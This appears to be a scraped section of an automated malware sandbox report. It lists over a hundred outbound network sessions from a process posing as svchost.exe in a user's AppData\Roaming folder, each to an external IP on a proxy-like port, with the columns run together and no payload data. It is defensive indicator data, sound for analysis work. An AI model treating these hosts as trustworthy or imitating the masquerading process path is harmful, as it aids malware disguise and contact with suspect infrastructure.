                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4538192.168.2.56405069.61.200.1043618156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4539192.168.2.56414851.210.223.9300056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4540192.168.2.564228129.213.150.205808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4541192.168.2.563980111.16.50.12900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4542192.168.2.56240437.187.91.1921172156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4543192.168.2.564229201.174.239.28415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4544192.168.2.5640863.10.93.50312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4545192.168.2.56414984.39.112.144312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4546192.168.2.564250203.30.188.2478056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4547192.168.2.5641508.142.3.145330656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4548192.168.2.56417265.21.255.197312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4549192.168.2.56415583.243.92.154808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4550192.168.2.564268104.16.109.2138056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4551192.168.2.5642248.218.231.621567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4552192.168.2.564278104.17.171.2358056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4553192.168.2.56413752.172.1.186312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4554192.168.2.564303104.17.62.878056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4555192.168.2.56420647.93.121.2008056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4556192.168.2.563747203.76.121.237414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4557192.168.2.564310159.65.77.168858556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4558192.168.2.56420743.255.113.2328456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4559192.168.2.563767188.164.196.316296656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4560192.168.2.564288162.241.158.2046336056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4561192.168.2.564248199.58.185.9414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4562192.168.2.564322104.16.104.128043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4563192.168.2.564236119.3.215.41888843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4564192.168.2.564225185.189.100.2001108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4565192.168.2.56431594.131.63.1205837843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4566192.168.2.564243202.83.102.83808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4567192.168.2.56337092.204.134.385972756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4568192.168.2.564331104.25.167.888043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4569192.168.2.564247211.222.252.1878056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4570192.168.2.56428546.17.63.1661000056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4571192.168.2.56430493.190.141.1024785156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4572192.168.2.56427058.234.116.197819756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4573192.168.2.56430913.38.176.104312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4574192.168.2.564340172.67.254.1278056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4575192.168.2.564344104.24.220.528056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4576192.168.2.56425345.11.95.165521956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4577192.168.2.564323150.230.96.1501929143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4578192.168.2.56429485.214.118.988056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4579192.168.2.56430543.131.246.771567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4580192.168.2.564256203.95.198.170808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4581192.168.2.564354162.159.242.88056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4582192.168.2.564361162.214.170.1443759243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4583192.168.2.564254116.199.168.1414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4584192.168.2.5643188.222.164.2051567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4585192.168.2.56431643.128.107.251888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4586192.168.2.564010142.54.231.38414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4587192.168.2.564398172.67.181.208043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4588192.168.2.56438731.204.28.136543256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4589192.168.2.564342184.185.2.12414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4590192.168.2.56438438.162.13.126312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4591192.168.2.563373103.125.240.237808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4592192.168.2.563814101.255.167.142312556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4593192.168.2.564410185.162.228.1548043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4594192.168.2.564428104.25.108.1208056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4595192.168.2.56251492.204.136.1491669156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4596192.168.2.56426383.143.24.668043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4597192.168.2.56432794.20.183.1728056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4598192.168.2.56431594.131.63.1205837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4599192.168.2.56434661.129.2.212808043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4600192.168.2.5643535.58.47.25362956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4601192.168.2.564345103.178.194.190111143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4602192.168.2.564484104.25.64.278043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4603192.168.2.564461104.16.207.868056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4604192.168.2.564435129.213.150.205808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4605192.168.2.564451162.214.225.2234955656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4606192.168.2.56401498.188.47.150414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4607192.168.2.56443692.204.135.375860456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4608192.168.2.564440201.174.239.28415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4609192.168.2.564453159.65.77.168858556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4610192.168.2.564490185.238.228.678056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4611192.168.2.564452184.170.248.5414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4612192.168.2.564560104.22.50.2208043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4613192.168.2.564367103.49.202.2528056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4614192.168.2.56259592.204.134.385446756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4615192.168.2.564502104.23.128.1748056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4616192.168.2.564510104.20.178.1668056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4617192.168.2.564519203.24.108.1948056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4618192.168.2.564520104.17.166.2108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4619192.168.2.564450162.159.243.1788056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4620192.168.2.56388916.162.211.90108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4621192.168.2.56441947.243.114.192818056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4622192.168.2.564543104.16.105.1428056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4623192.168.2.564553172.67.181.1298056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4624192.168.2.564536162.214.225.2234841456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4625192.168.2.56442280.67.8.68056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4626192.168.2.564437221.153.92.398056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4627192.168.2.564429192.169.205.1313567056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4628192.168.2.564441198.44.255.38056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4629192.168.2.5644398.217.143.1871567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4630192.168.2.56449192.204.135.376296956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4631192.168.2.56442451.83.140.70818156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4632192.168.2.56340680.169.243.234108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4633192.168.2.56340137.187.77.582938056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4634192.168.2.562482139.198.120.152952756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4635192.168.2.562512213.136.78.2001992556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4636192.168.2.564546104.45.128.1228056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4637192.168.2.564476217.69.121.141580656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4638192.168.2.56444658.234.116.1978056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4639192.168.2.563984186.96.50.2099956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4640192.168.2.56444741.111.198.1088056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4641192.168.2.564455121.128.194.1548056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4642192.168.2.56445443.133.70.571567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4643192.168.2.56257291.134.140.1601648756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4644192.168.2.56340945.117.179.240852056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4645192.168.2.56451393.190.142.572654156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4646192.168.2.564499139.162.181.1776084456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4647192.168.2.563951106.14.255.1248056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4648192.168.2.564462146.190.84.2091825556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4649192.168.2.56452984.39.112.144312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4650192.168.2.56451120.206.106.1928056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4651192.168.2.564488167.172.86.461047156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4652192.168.2.5645128.219.228.1001567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4653192.168.2.564381112.30.155.831279256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4654192.168.2.56455045.227.193.166808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4655192.168.2.5645668.218.231.621567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4656192.168.2.563446174.136.57.1693376156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4657192.168.2.56455246.17.63.166444456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4658192.168.2.564539154.65.39.88043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4659192.168.2.564180192.111.134.10414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4660192.168.2.56448962.171.133.66312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4661192.168.2.564080184.178.172.281529456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4662192.168.2.564607172.67.181.1078056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4663192.168.2.564526111.206.0.99818156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4664192.168.2.563477148.66.130.53503156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4665192.168.2.563487161.97.173.783598156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4666192.168.2.563434148.72.212.2123390556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4667192.168.2.564606129.213.150.205808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4668192.168.2.564464120.194.4.1578256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4669192.168.2.564596184.185.2.12414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4670192.168.2.564577211.222.252.1878056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4671192.168.2.564473117.160.250.163999956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4672192.168.2.56457443.131.248.1651567343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4673192.168.2.564644154.208.10.1268043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4674192.168.2.564608104.145.235.200312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4675192.168.2.564580177.12.118.1608056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4676192.168.2.564581202.83.102.83808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4677192.168.2.563513162.214.121.11299356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


